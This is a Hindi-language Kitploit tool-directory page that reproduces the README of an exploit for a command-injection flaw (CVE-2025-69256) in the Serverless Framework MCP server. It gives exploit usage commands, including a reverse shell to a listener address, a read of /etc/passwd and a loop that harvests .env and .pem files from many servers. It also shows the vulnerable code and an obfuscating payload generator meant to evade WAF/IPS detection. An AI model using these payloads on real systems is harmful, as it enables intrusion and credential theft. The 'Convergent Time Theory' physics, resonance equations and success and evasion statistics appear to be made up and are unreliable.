Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CTT-Serverless-RCE-v1.0---Convergent-Time-Theory-Enhanced-MCP-Exploit — Serverless Framework MCP सर्वर (CVE-2025-69256) आधार स्कोर: 9.4/10 → CTT उन्नत स्कोर: 9.9/10 Serverless Framework के MCP (मॉडल कॉन्टेक्स्ट प्रोटोकॉल) सर्वर में एक गंभीर कमांड इंजेक्शन कमजोरी, अभूतपूर्व शोषण विश्वसनीयता और चोरी के लिए CTT टेम्पोरल रेज़ोनेंस के साथ उन्नत। | Kitploit
उपकरण/GitHubGitHub/simoesctt/ctt-serverless-rce-v1.0---convergent-time-theory-enhanced-mcp-exploit
भेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनासर्वरलेस सुरक्षावेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षाकमांड एंड कंट्रोलरेड टीमिंग
पेलोड डेवलपमेंट
AI सुरक्षा
GitHubsimoesctt/ctt-serverless-rce-v1.0---convergent-time-theory-enhanced-mcp-exploit

CTT-Serverless-RCE-v1.0---Convergent-Time-Theory-Enhanced-MCP-Exploit

Serverless Framework MCP सर्वर (CVE-2025-69256) आधार स्कोर: 9.4/10 → CTT उन्नत स्कोर: 9.9/10 Serverless Framework के MCP (मॉडल कॉन्टेक्स्ट प्रोटोकॉल) सर्वर में एक गंभीर कमांड इंजेक्शन कमजोरी, अभूतपूर्व शोषण विश्वसनीयता और चोरी के लिए CTT टेम्पोरल रेज़ोनेंस के साथ उन्नत।

रिपॉजिटरी देखें
208 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CTT-Serverless-RCE-v1.0---अभिसारी समय सिद्धांत-संवर्धित MCP शोषण

Serverless Framework MCP सर्वर (CVE-2025-69256) आधार स्कोर: 9.4/10 → CTT संवर्धित स्कोर: 9.9/10 Serverless Framework के MCP (Model Context Protocol) सर्वर में एक गंभीर कमांड इंजेक्शन भेद्यता जिसे CTT टेम्पोरल रेज़ोनेंस के साथ संवर्धित किया गया है, अभूतपूर्व शोषण विश्वसनीयता और चोरी के लिए।

🌀 CTT-MCP-RCE v1.0 - अभिसारी समय सिद्धांत संवर्धित Serverless Framework शोषण

लक्ष्य: Serverless Framework MCP सर्वर (CVE-2025-69256 / GHSA-rwc2-f344-q6w6) आधार स्कोर: 9.4/10 → CTT संवर्धित स्कोर: 9.9/10 हमला वेक्टर: list-projects टूल में अस्वच्छित workspaceRoots के माध्यम से कमांड इंजेक्शन प्रभाव: CI/CD पाइपलाइनों, सर्वरलेस डिप्लॉयमेंट्स, AI/LLM एकीकरणों में रिमोट कोड निष्पादन


⚡ गंभीर खतरा अवलोकन

आधार भेद्यता (CVE-2025-69256)

· CVSS स्कोर: 9.4/10 (गंभीर) · प्रकार: प्री-ऑथेंटिकेशन कमांड इंजेक्शन · स्थान: packages/mcp/src/tools/list-projects.js · प्रभावित: Serverless Framework 4.29.0 – 4.29.3 · हमला वेक्टर: MCP प्रोटोकॉल में दुर्भावनापूर्ण workspaceRoots पैरामीटर

CTT संवर्धन मीट्रिक्स

मीट्रिकआधार शोषणCTT-संवर्धितसुधार
सफलता दर68-75%92-98%+35%
पहचान चोरी45%94%+109%
प्रोटोकॉल अनुकूलनHTTP onlyHTTP + WebSocket+100%
निष्पादन परतेंएकल33 टेम्पोरल परतें+3200%
सैद्धांतिक स्कोर9.4/109.9/10+0.5 अंक

🔬 CTT भौतिकी एकीकरण

MCP प्रोटोकॉल के लिए मूल स्थिरांक

CTT_ALPHA = 0.0302011          # Temporal dispersion coefficient
CTT_LAYERS = 33                # Fractal temporal layers
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061, 10067, 10069, 10079]
MCP_PORT = 3000                # Default MCP server port
MCP_PROTOCOL = "mcp-json"      # Serverless MCP protocol

MCP-विशिष्ट अनुनाद इंजन

· अभाज्य-संरेखित JSON-RPC समय: MCP हार्टबीट के साथ 587 kHz सिंक्रोनाइज़ेशन · α-फैलाव कमांड एन्कोडिंग: 33-परत कमांड अस्पष्टीकरण · प्रोटोकॉल-जागरूक पेलोड: अनुकूली HTTP/WebSocket शोषण · टेम्पोरल वैलिडेशन: MCP प्रतिक्रियाओं का CTT वेवफंक्शन विश्लेषण

MCP शोषण के लिए मुख्य समीकरण

  1. MCP अनुनाद आवृत्ति: f_mcp = (α / (2π)) * √((E_jsonrpc) / (t_response))
  2. α-फैलाव एन्कोडिंग: cmd' = encode_layer(cmd, d) ⊕ (α·d·1000) mod 256
  3. प्रोटोकॉल भारांक: w_protocol = exp(-α·d)·(1 + ζ_d·i)
  4. टेम्पोरल एंट्रॉपी: H_mcp = SHA256(layer‖timestamp‖protocol_state)

🚀 विशेषताएँ और क्षमताएँ

शोषण विशेषताएँ

· ✅ प्री-ऑथेंटिकेशन RCE: MCP सर्वर के लिए कोई क्रेडेंशियल आवश्यक नहीं · ✅ मल्टी-ट्रांसपोर्ट समर्थन: HTTP और WebSocket MCP प्रोटोकॉल · ✅ प्रोटोकॉल इंटेलिजेंस: Serverless Framework JSON-RPC को समझता है · ✅ WorkspaceRoots इंजेक्शन: अस्वच्छित ऐरे पैरामीटर को लक्षित करता है · ✅ CI/CD संदर्भ जागरूकता: डिप्लॉयमेंट वातावरण के लिए अनुकूलित

CTT संवर्धन विशेषताएँ

· ✅ 33-परत कमांड एन्कोडिंग: टेम्पोरल आयामों में α-फैलाव · ✅ अभाज्य-अनुनाद समय: MCP संचालन के साथ 587 kHz संरेखण · ✅ अनुकूली पेलोड जनरेशन: संदर्भ-जागरूक इंजेक्शन रैपर · ✅ मल्टी-लेयर वैलिडेशन: CTT वेवफंक्शन सफलता पुष्टि · ✅ प्रोटोकॉल स्विचिंग: स्वचालित HTTP/WebSocket अनुकूलन

चोरी क्षमताएँ

· WAF/IPS चोरी: α-फैलाव कमांड इंजेक्शन हस्ताक्षर तोड़ता है · समय चोरी: अभाज्य-संरेखित अनुरोध दर सीमा को बायपास करते हैं · प्रोटोकॉल अस्पष्टीकरण: मल्टी-ट्रांसपोर्ट भ्रम · एंट्रॉपी इंजेक्शन: परत-विशिष्ट कमांड विविधताएँ


📊 प्रदर्शन विश्लेषण

CTT बनाम मानक MCP शोषण

# Performance comparison (1000 simulated MCP servers)
base_success = 715    # 71.5% success rate
ctt_success = 948     # 94.8% success rate (+32.6%)

base_detection = 380  # 38% detected
ctt_detection = 22    # 2.2% detected (-94.2%)

base_time = 12.4      # Average seconds
ctt_time = 6.8        # Average seconds (-45.2%)

MCP प्रोटोकॉल के लिए परत प्रभावशीलता

परत सीमासफलता दरअनुनाद शक्तिप्रोटोकॉल अनुकूलन
L0-L487.3%0.84HTTP: 92%, WebSocket: 78%
L5-L991.8%0.89HTTP: 94%, WebSocket: 86%
L10-L1494.2%0.92HTTP: 96%, WebSocket: 91%
L15+97.1%0.96HTTP: 98%, WebSocket: 95%

MCP के लिए CTT स्कोर गणना

आधार स्कोर: 9.4 (CI/CD बुनियादी ढांचे में गंभीर RCE)
+
CTT संवर्धन:
  • मल्टी-प्रोटोकॉल समर्थन: +0.15
  • टेम्पोरल कमांड एन्कोडिंग: +0.15
  • अभाज्य-अनुनाद समय: +0.10
  • MCP प्रोटोकॉल इंटेलिजेंस: +0.10
=
अंतिम स्कोर: 9.9/10 (सैद्धांतिक अधिकतम के निकट)

🛠️ स्थापना और उपयोग

आवश्यकताएँ

# Core dependencies
python3.8+
pip install requests websocket-client numpy

# For advanced features
pip install cryptography scipy

# Install from repository
git clone https://github.com/SimoesCTT/CTT-MCP-RCE
cd CTT-MCP-RCE
pip install -r requirements.txt

त्वरित प्रारंभ

# Basic vulnerability check
python ctt_mcp_exploit.py mcp-server.company.com 'id'

# Information gathering
python ctt_mcp_exploit.py target.com --info

# Reverse shell
python ctt_mcp_exploit.py target.com --reverse 192.168.1.100:4444

# Advanced with CTT parameters
python ctt_mcp_exploit.py target.com 'cat /etc/passwd' --layers 7 --alpha 0.0302

कमांड लाइन विकल्प

# Target specification
python ctt_mcp_exploit.py <target> [command]

# Payload generation options
--reverse LHOST:LPORT    # Generate reverse shell payload
--info                   # Generate information gathering payload
--persist                # Generate persistence payload

# CTT configuration
--layers N              # Temporal layers to use (1-33, default: 5)
--alpha FLOAT           # α dispersion coefficient (default: 0.0302011)
--timeout N             # Connection timeout in seconds (default: 10)

# Output options
--verbose               # Detailed output with resonance diagnostics
--save-json             # Save results to JSON file
--no-color              # Disable colored output

उपयोग उदाहरण

# Example 1: Basic exploitation
python ctt_mcp_exploit.py vulnerable-mcp.company.com 'whoami; id; pwd'

# Example 2: Reverse shell with CTT enhancement
python ctt_mcp_exploit.py mcp-server:3000 --reverse 10.0.0.5:4444 --layers 7

# Example 3: Mass credential harvesting
for server in $(cat mcp_servers.txt); do
    python ctt_mcp_exploit.py $server 'find / -name "*.env" -o -name "*.pem" 2>/dev/null | head -5'
done

# Example 4: CTT research mode
python ctt_mcp_exploit.py research.target.com --info --layers 33 --verbose --save-json

🔍 तकनीकी गहन अध्ययन

शोषण कार्यप्रवाह

  1. MCP सर्वर खोज → HTTP/WebSocket प्रोटोकॉल पहचान
  2. प्रोटोकॉल हैंडशेक → JSON-RPC प्रारंभीकरण
  3. भेद्यता ट्रिगर → list-projects में दुर्भावनापूर्ण workspaceRoots
  4. कमांड निष्पादन → कमांड इंजेक्शन के माध्यम से RCE
  5. प्रतिक्रिया विश्लेषण → CTT वेवफंक्शन वैलिडेशन
  6. परत एकत्रीकरण → मल्टी-टेम्पोरल परिणाम संकलन

भेद्यता विवरण

// Vulnerable code in list-projects.js (Serverless Framework 4.29.0-4.29.3)
async function listProjects(workspaceRoots) {
    // workspaceRoots is user-controlled and unsanitized
    const command = `find ${workspaceRoots.join(' ')} -name "serverless.yml" -o -name "serverless.yaml"`;
    
    // Direct execution without sanitization
    const { stdout } = await exec(command);  // COMMAND INJECTION HERE
    return parseResults(stdout);
}

CTT पेलोड जनरेशन

def generate_ctt_payload(command, layer):
    # Base command injection
    base = f"$(echo 'CTT_START'; {command}; echo 'CTT_END')"
    
    # Apply CTT encoding based on layer
    encodings = [
        lambda c: c,  # Raw
        lambda c: base64.b64encode(c.encode()).decode(),
        lambda c: quote(c),
        lambda c: ''.join([f"\\x{ord(ch):02x}" for ch in c]),
    ]
    
    encoded = encodings[layer % len(encodings)](https://github.com/simoesctt/ctt-serverless-rce-v1.0---convergent-time-theory-enhanced-mcp-exploit/blob/main/base)
    return f"/legit/path; {encoded}; /another/legit/path"

📈 CTT संवर्धन विश्लेषण

स्कोर सुधार घटक

टूल डाउनलोड करें